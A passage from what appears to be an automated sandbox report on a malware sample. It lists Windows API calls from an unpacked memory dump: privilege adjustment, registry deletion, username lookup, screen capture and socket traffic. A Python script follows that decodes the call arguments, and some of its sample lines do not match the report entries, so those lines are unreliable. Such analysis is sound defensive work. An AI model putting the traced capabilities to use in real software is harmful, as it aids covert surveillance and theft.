                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04EB922C,?,Function_000568D8,00000000), ref: 04EBD35D
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,?,?,04EB922C,?,Function_000568D8,00000000), ref: 04EBD371
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 04EBD37D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressCreateEventLibraryLoadProc
                                                                                    • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                    • API String ID: 3086787778-64178277
                                                                                    • Opcode ID: 867d1249bc82865283eda7804027dba4f3bdae92368cc311060a5bf577d61dbc
                                                                                    • Instruction ID: 888e247123734097be86e76ff375544073878ee48c60130d99bacab32bd60ff2
                                                                                    • Opcode Fuzzy Hash: 867d1249bc82865283eda7804027dba4f3bdae92368cc311060a5bf577d61dbc
                                                                                    • Instruction Fuzzy Hash: 8F016D71740309BFE7249FA5CC46FAB7B98AB04B50F105119B79A9E1C0EAB4B5808BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,04EDEFE5,?,?,04EDEF85,?,04F00690,0000000C,04EDF0B8,00000000,00000000), ref: 04EDF054
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 04EDF067
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,04EDEFE5,?,?,04EDEF85,?,04F00690,0000000C,04EDF0B8,00000000,00000000,00000001,04ED5E8A), ref: 04EDF08A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: e51be322ad69717b936e55769e941d59f5f112b4bef70f168cc6c4a92a27b3ae
                                                                                    • Instruction ID: 5e8e7f268e3a519f99486328b1f9a92bd2c000cca655fce1337222ba8d081823
                                                                                    • Opcode Fuzzy Hash: e51be322ad69717b936e55769e941d59f5f112b4bef70f168cc6c4a92a27b3ae
                                                                                    • Instruction Fuzzy Hash: AFF0C230A01208BBCB14DFA5DC08BADBFB4EF48716F054268FD09A2240CB74AD45CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?), ref: 04EC1433
                                                                                    • RegQueryInfoKeyW.ADVAPI32 ref: 04EC145E
                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00020119,?), ref: 04EC14C5
                                                                                    • RegEnumValueW.ADVAPI32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000004,?,?,?,00000000,00000004), ref: 04EC15BF
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00020119,?), ref: 04EC15F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumValue$CloseInfoOpenQuery
                                                                                    • String ID:
                                                                                    • API String ID: 2078201404-0
                                                                                    • Opcode ID: 8c13f2e37e98c8abc6b5fa593368db0514a9a35a367d18fb779cacf7452a465e
                                                                                    • Instruction ID: 6e7f3339bda478072c326c4027bf9536a70d753bcf94971475d2dc3f2124f502
                                                                                    • Opcode Fuzzy Hash: 8c13f2e37e98c8abc6b5fa593368db0514a9a35a367d18fb779cacf7452a465e
                                                                                    • Instruction Fuzzy Hash: B8911EB1D00119AFDF04DFA9D944AEEBBB8EF48354F148029E816E7240D774AA05CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04ECCC60: StrChrW.SHLWAPI(?,0000003A), ref: 04ECCC84
                                                                                    • WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECEC16
                                                                                      • Part of subcall function 04ECCD10: WSASetLastError.WS2_32(00002741), ref: 04ECCD3A
                                                                                    • socket.WS2_32(00000000,00000001,00000006), ref: 04ECEC39
                                                                                    • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 04ECEC83
                                                                                    • WSAGetLastError.WS2_32 ref: 04ECEC8E
                                                                                    • WSACreateEvent.WS2_32 ref: 04ECECAE
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                                                    • String ID:
                                                                                    • API String ID: 688454317-0
                                                                                    • Opcode ID: 3cef7d9e3ea38d5f02927d32446fcc6fbe48b6e62d1415d8eed321e55ecb2cdb
                                                                                    • Instruction ID: 5efafa711b5056b9baacf8e3e5625017e52fc6b2ebe2c8a80d2339c0b494304e
                                                                                    • Opcode Fuzzy Hash: 3cef7d9e3ea38d5f02927d32446fcc6fbe48b6e62d1415d8eed321e55ecb2cdb
                                                                                    • Instruction Fuzzy Hash: C041E475A002449BEB24DF69DA40FBE77B5EF84315F10116EED06E7280EB70B942DB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 3b4435d064f55bde033720603e8c5f8f7034bca40576b3bee57121b6c0ee9df7
                                                                                    • Instruction ID: 044d93483f48b90ac0f1a00c07dd8878e180d42d97b98009bc331e92fcced9a5
                                                                                    • Opcode Fuzzy Hash: 3b4435d064f55bde033720603e8c5f8f7034bca40576b3bee57121b6c0ee9df7
                                                                                    • Instruction Fuzzy Hash: BA41D132A00614AFDB20DFB9C880A7DB7B5FF84318F1695A9D519EB380D671F941CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04EC5530: GetCurrentThreadId.KERNEL32 ref: 04EC5548
                                                                                      • Part of subcall function 04EC5530: GetThreadDesktop.USER32(00000000), ref: 04EC554F
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC558F
                                                                                      • Part of subcall function 04EC5530: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 04EC559A
                                                                                      • Part of subcall function 04EC5530: GetUserObjectInformationA.USER32 ref: 04EC55CE
                                                                                      • Part of subcall function 04EC5530: lstrcmpiA.KERNEL32(?,?), ref: 04EC55DE
                                                                                      • Part of subcall function 04EC5530: SetThreadDesktop.USER32(00000000), ref: 04EC55E9
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(?), ref: 04EC55FD
                                                                                      • Part of subcall function 04EC5530: CloseDesktop.USER32(00000000), ref: 04EC5600
                                                                                    • ReleaseDC.USER32 ref: 04EC2751
                                                                                    • GetDesktopWindow.USER32 ref: 04EC2757
                                                                                    • GetDC.USER32(00000000), ref: 04EC2764
                                                                                      • Part of subcall function 04EC2AD0: BitBlt.GDI32(00000000,00000000,00000000,?,00000001,?,00000000,00000000,?), ref: 04EC2AF7
                                                                                      • Part of subcall function 04EC2AD0: SetRect.USER32 ref: 04EC2B20
                                                                                    • GetCursorPos.USER32(?), ref: 04EC2783
                                                                                    • BitBlt.GDI32(?,00000000,00000000,00000002,?,?,00000000,00000000,?), ref: 04EC27D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentCursorInputOpenRectReleaseWindowlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 1863377006-0
                                                                                    • Opcode ID: 244c49fd097c8c30ba37ae102ac8b9e92fd37be41a49d5211b41485c2151e8a7
                                                                                    • Instruction ID: b9d3c1949a7d128e8e601b0058db2792c687a578fb4905d59c3b90af374de996
                                                                                    • Opcode Fuzzy Hash: 244c49fd097c8c30ba37ae102ac8b9e92fd37be41a49d5211b41485c2151e8a7
                                                                                    • Instruction Fuzzy Hash: 99415C72A00A06BFCB11CF69DA84B94F7B1FF58314F044299EA0497A51D731F8A2CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 04ECCC60: StrChrW.SHLWAPI(?,0000003A), ref: 04ECCC84
                                                                                    • WSASetLastError.WS2_32(0000273F,?,?), ref: 04ECD6F6
                                                                                      • Part of subcall function 04ECCD10: WSASetLastError.WS2_32(00002741), ref: 04ECCD3A
                                                                                    • socket.WS2_32(00000000,00000002,00000011), ref: 04ECD719
                                                                                    • WSAIoctl.WS2_32(00000000,9800000C,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 04ECD746
                                                                                    • WSAGetLastError.WS2_32 ref: 04ECD751
                                                                                    • WSACreateEvent.WS2_32 ref: 04ECD771
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CriticalSection$CreateEnterEventExceptionIoctlLeaveRaisesocket
                                                                                    • String ID:
                                                                                    • API String ID: 688454317-0
                                                                                    • Opcode ID: 0fcdd70020a1a2df0d37f1b180cc19d2b20934ce9653e8800a4a9cd4e9978495
                                                                                    • Instruction ID: a26c5980e051388568f0c6da5c7769078b30af1ec68da78346b3f35e713eff7f
                                                                                    • Opcode Fuzzy Hash: 0fcdd70020a1a2df0d37f1b180cc19d2b20934ce9653e8800a4a9cd4e9978495
                                                                                    • Instruction Fuzzy Hash: 4B31C775A00204ABE724EF64DD84FAE77A4EF88314F20556EED0AD72C0EB71B942C755
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,04EB87E8,04EB8B5E,00000000,?,?,04EB8B5E,04EFD024,?), ref: 04EB824B
                                                                                      • Part of subcall function 04EBABA0: HeapCreate.KERNEL32(00000004,00000000,00000000,74E5F5E0,00000004,04EB8319,?,04EB8B5E,04EFD024,?), ref: 04EBABC5
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000150,00000000,?,04EB8B5E,04EFD024,?), ref: 04EB832C
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04EB8B5E,04EFD024,?), ref: 04EB8366
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04EB8B5E,04EFD024,?), ref: 04EB837B
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EB838F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                                                    • String ID:
                                                                                    • API String ID: 1949328396-0
                                                                                    • Opcode ID: bd6426d10246ec5444bc02ccf50ff0bde76fc36f47190b635c125bc8a0e3f335
                                                                                    • Instruction ID: 6ed27a6fb872ef6ff78fe994e7fcc893d010a138dd4d79e7dfae1ec4f7793c52
                                                                                    • Opcode Fuzzy Hash: bd6426d10246ec5444bc02ccf50ff0bde76fc36f47190b635c125bc8a0e3f335
                                                                                    • Instruction Fuzzy Hash: B941BEB0140B01AAF3709F25CC59B97BAE8AF00758F10591DD69A6A6D0DBF6B148CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,?,04EB8B17,04EFD048,?), ref: 04EB7F6B
                                                                                      • Part of subcall function 04EBABA0: HeapCreate.KERNEL32(00000004,00000000,00000000,74E5F5E0,00000004,04EB8319,?,04EB8B5E,04EFD024,?), ref: 04EBABC5
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00000000,?,04EB8B17,04EFD048,?), ref: 04EB804C
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,04EB8B17,04EFD048,?), ref: 04EB8086
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,04EB8B17,04EFD048,?), ref: 04EB809B
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EB80AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$Event$CountCriticalHeapInitializeSectionSpin
                                                                                    • String ID:
                                                                                    • API String ID: 1949328396-0
                                                                                    • Opcode ID: 3850d071bb55db40b202ebc765f7a97a1ac683e21d307a882c82856952c58772
                                                                                    • Instruction ID: c183bf1bdc77481a544de9936141c3f85a0c3e439728eba0c94d23663b6c3465
                                                                                    • Opcode Fuzzy Hash: 3850d071bb55db40b202ebc765f7a97a1ac683e21d307a882c82856952c58772
                                                                                    • Instruction Fuzzy Hash: 9641DDB0140B01ABF3709F65CC59B83BAE8AF00748F10591DE69A6A6D0DBF6B148CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC4461
                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenUser),00000000,00000000,00000000,?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC4486
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC4490
                                                                                    • GetTokenInformation.ADVAPI32(00000000,00000001(TokenUser),00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC44CD
                                                                                    • LookupAccountSidW.ADVAPI32(00000000,00000000,?,00000100,?,00000100,?), ref: 04EC44FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Token$Information$AccountErrorLastLookupOpenProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2790146286-0
                                                                                    • Opcode ID: 936be4ccb75b3c3c8f04db1d67ba091504c817912c07d1270256ca82c8e8b717
                                                                                    • Instruction ID: 1fad238e00ccf47d4002f6e6f79a199f1cda819a64e3407e7fdd1f32b02e8b9d
                                                                                    • Opcode Fuzzy Hash: 936be4ccb75b3c3c8f04db1d67ba091504c817912c07d1270256ca82c8e8b717
                                                                                    • Instruction Fuzzy Hash: 4C4165B590011CAAEB30DB50DD45FEA77BCEF44704F0051E9EB09B6180EB75AE868B69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 04ECCE3C
                                                                                    • WSASetLastError.WS2_32(00000000), ref: 04ECCE5E
                                                                                    • freeaddrinfo.WS2_32(?), ref: 04ECCEBB
                                                                                    • htons.WS2_32(?), ref: 04ECCEC9
                                                                                    • WSASetLastError.WS2_32(00002AF9), ref: 04ECCEEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$freeaddrinfogetaddrinfohtons
                                                                                    • String ID:
                                                                                    • API String ID: 1798125793-0
                                                                                    • Opcode ID: 93e72224e23bf877c8f8ab9020c98ab66788a9aae633a1a592c0eccd1902ca4a
                                                                                    • Instruction ID: a5557f10984f1a645c688c95b48086b51b8f397f3159c84d2a586f0e865c8cf3
                                                                                    • Opcode Fuzzy Hash: 93e72224e23bf877c8f8ab9020c98ab66788a9aae633a1a592c0eccd1902ca4a
                                                                                    • Instruction Fuzzy Hash: 3841BC76A083008FC720DF24E845BBBB7E5FF8A315F11566EE84D8B250EB31A845C792
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04ED470B
                                                                                    • WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04ED473E
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED4749
                                                                                    • InterlockedDecrement.KERNEL32(00000002), ref: 04ED4759
                                                                                    • HeapFree.KERNEL32(?,00000000,?,?), ref: 04ED4789
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementErrorExchangeFreeHeapLastSend
                                                                                    • String ID:
                                                                                    • API String ID: 930714758-0
                                                                                    • Opcode ID: c7d09c13f2fd72d9b5ffee5a9fee8398bbda3812fb1351d43f6b6c3b36495383
                                                                                    • Instruction ID: 2576b4b2646981919523177fe344242eb856c69b3847b9562fd38ed37f0176cb
                                                                                    • Opcode Fuzzy Hash: c7d09c13f2fd72d9b5ffee5a9fee8398bbda3812fb1351d43f6b6c3b36495383
                                                                                    • Instruction Fuzzy Hash: 23418D75500204DFDB20CF25D984BAAB7F8FF95314F045669ED4A8B285DB31B806CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 04ECF284
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ECF2DB
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 04ECF31F
                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 04ECF331
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ECF370
                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 04ECF398
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterFreeHeapLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3296397286-0
                                                                                    • Opcode ID: e3bc8e9066563da586db866b7be61f5b603c9fe6287cdb1ebedaa3ec728749c2
                                                                                    • Instruction ID: 0e46c63fdc0008729a88f645f98171c1442d7d4cb593368ad60b4f90b2457688
                                                                                    • Opcode Fuzzy Hash: e3bc8e9066563da586db866b7be61f5b603c9fe6287cdb1ebedaa3ec728749c2
                                                                                    • Instruction Fuzzy Hash: 91314D75500200AFDB108F19DA88BE6B7F9FF85315F14927DEC188B285EB35A846CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 04EC100E
                                                                                    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00000102,?), ref: 04EC1043
                                                                                    • RegDeleteValueW.ADVAPI32(?,00000000), ref: 04EC1051
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC105F
                                                                                    • LocalFree.KERNEL32(?,?,?,0000003F), ref: 04EC1080
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCloseDeleteFreeOpenValue
                                                                                    • String ID:
                                                                                    • API String ID: 3540541088-0
                                                                                    • Opcode ID: a9554ba0b0e4a2bc7bac77eab70267639fdbe3632afa6d75de1bd8e0807419c3
                                                                                    • Instruction ID: 6f407b17b18abfe4cda5b6d1bf7945e518c6341f2a9cba10fed5fde9990bec46
                                                                                    • Opcode Fuzzy Hash: a9554ba0b0e4a2bc7bac77eab70267639fdbe3632afa6d75de1bd8e0807419c3
                                                                                    • Instruction Fuzzy Hash: E0318DB5D00219EBEB10DFA4D945AEEBBB8FF44354F14802AFD15A7240D735AA16CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
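The Winsock, token and registry entries above (and the CreateFileW entry that follows) list their arguments as raw 32-bit hex, which hides what the unpacked code is configuring. The decoder below is an added example for this report section, not code from Joe Sandbox or from the sample: it parses lines in the report's `Name.MODULE(args), ref: ADDR` format and names the constants using values from the public Windows SDK headers (ws2def.h, mstcpip.h, winerror.h, winnt.h, winuser.h). The sample lines embedded in it are copied from the entries on this page; all function and table names are the example's own. Decoded, the two WSAIoctl calls are SIO_KEEPALIVE_VALS (IOC_IN|IOC_VENDOR|4, with the 12-byte tcp_keepalive input buffer the entry shows) on the TCP socket and SIO_UDP_CONNRESET (IOC_IN|IOC_VENDOR|12, a 4-byte BOOL) on the UDP socket; the WSASetLastError values 0x273F, 0x2741 and 0x2AF9 are WSAEAFNOSUPPORT, WSAEADDRNOTAVAIL and WSAHOST_NOT_FOUND; TOKEN_INFORMATION_CLASS value 1 is TokenUser (TokenIntegrityLevel is 25), which is what makes the following LookupAccountSidW call a username lookup; RegOpenKeyExW access 0x102 is KEY_SET_VALUE|KEY_WOW64_64KEY, so the RegDeleteValueW that follows removes a value from the 64-bit registry view.

```python
"""Decode the hex arguments in Joe Sandbox "APIs" entries into Win32/Winsock constant names.

Added example for this report section, not code from Joe Sandbox or from the sample.
Constant values come from the public Windows SDK headers (ws2def.h, mstcpip.h,
winerror.h, winnt.h, winuser.h); SAMPLE_LINES are copied from the report entries.
"""
import re

# Joe Sandbox prints one call per line as  Name.MODULE(arg,arg,...), ref: ADDR
# Arguments are 32-bit hex, "?" when unresolved, sometimes suffixed with "(Name)".
CALL_RE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>(?:[^()]|\([^()]*\))*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Winsock control codes are built by _WSAIO*(group, number) as direction | group | number.
IOC_DIRECTION = {0x80000000: "IOC_IN", 0x40000000: "IOC_OUT", 0xC0000000: "IOC_INOUT"}
IOC_GROUPS = {0x08000000: "IOC_WS2", 0x10000000: "IOC_PROTOCOL", 0x18000000: "IOC_VENDOR"}
SIO_NAMES = {
    (0x18000000, 4): "SIO_KEEPALIVE_VALS",
    (0x18000000, 12): "SIO_UDP_CONNRESET",
    (0x08000000, 6): "SIO_GET_EXTENSION_FUNCTION_POINTER",
}
WSA_ERRORS = {0x273F: "WSAEAFNOSUPPORT", 0x2741: "WSAEADDRNOTAVAIL", 0x2AF9: "WSAHOST_NOT_FOUND"}
WIN_ERRORS = {0x139F: "ERROR_INVALID_STATE"}
AF_NAMES = {0: "AF_UNSPEC", 2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTOCOLS = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
TOKEN_CLASSES = {1: "TokenUser", 25: "TokenIntegrityLevel"}
TOKEN_ACCESS = {0x0008: "TOKEN_QUERY"}
KEY_ACCESS = {0x0002: "KEY_SET_VALUE", 0x0100: "KEY_WOW64_64KEY"}
FILE_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}
DESKTOP_ACCESS = {0x02000000: "MAXIMUM_ALLOWED"}


def decode_ioctl(code: int) -> str:
    """Split a Winsock ioctl code into the pieces the _WSAIO macros combine."""
    direction = IOC_DIRECTION.get(code & 0xC0000000, "IOC_VOID")
    group, number = code & 0x18000000, code & 0xFFFF
    name = SIO_NAMES.get((group, number), "unknown")
    return f"{name} ({direction}|{IOC_GROUPS.get(group, 'IOC_UNIX')}|{number})"


def decode_flags(value: int, table: dict) -> str:
    """Name every known bit in value; leftover bits are kept as hex."""
    names = [name for bit, name in table.items() if (value & bit) == bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def lookup(table: dict):
    """Decoder for single-valued arguments; unknown values stay hex."""
    return lambda value: table.get(value, hex(value))


# API name -> {argument index -> decoder}; indices follow the documented prototypes.
DECODERS = {
    "WSAIoctl": {1: decode_ioctl},
    "WSASetLastError": {0: lookup(WSA_ERRORS)},
    "SetLastError": {0: lookup(WIN_ERRORS)},
    "socket": {0: lookup(AF_NAMES), 1: lookup(SOCK_TYPES), 2: lookup(PROTOCOLS)},
    "OpenProcessToken": {1: lambda v: decode_flags(v, TOKEN_ACCESS)},
    "GetTokenInformation": {1: lookup(TOKEN_CLASSES)},
    "RegOpenKeyExW": {3: lambda v: decode_flags(v, KEY_ACCESS)},
    "CreateFileW": {1: lambda v: decode_flags(v, FILE_ACCESS),
                    2: lambda v: decode_flags(v, FILE_SHARE), 4: lookup(DISPOSITIONS)},
    "OpenInputDesktop": {2: lambda v: decode_flags(v, DESKTOP_ACCESS)},
}


def parse_call(line: str):
    """Return (name, module, args, ref) for one report line, or None if it is not a call."""
    m = CALL_RE.search(line)
    if not m:
        return None
    args = []
    for raw in m["args"].split(","):
        raw = re.sub(r"\([^)]*\)", "", raw).strip()  # drop the report's own "(Name)" label
        args.append(None if raw in ("", "?") else int(raw, 16))
    return m["name"], m["module"], args, int(m["ref"], 16)


def annotate(line: str) -> dict:
    """Map argument index -> decoded name for every argument this decoder knows."""
    parsed = parse_call(line)
    if parsed is None:
        return {}
    name, _module, args, _ref = parsed
    return {idx: fn(args[idx]) for idx, fn in DECODERS.get(name, {}).items()
            if idx < len(args) and args[idx] is not None}


# Constructed input: lines copied from the report entries on this page.
SAMPLE_LINES = [
    "socket.WS2_32(00000000,00000001,00000006), ref: 04ECEC39",
    "WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 04ECEC83",
    "socket.WS2_32(00000000,00000002,00000011), ref: 04ECD719",
    "WSAIoctl.WS2_32(00000000,9800000C,00000000,00000004,00000000,00000000,00000000,00000000,00000000), ref: 04ECD746",
    "WSASetLastError.WS2_32(00002AF9), ref: 04ECCEEF",
    "OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC4461",
    "GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,?,?,?,?,?,?,00000001,74E069A0), ref: 04EC4486",
    "RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00000102,?), ref: 04EC1043",
    "CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000007,?,?,?), ref: 04EB5011",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(f"{parse_call(line)[0]:20s} {annotate(line)}")
```

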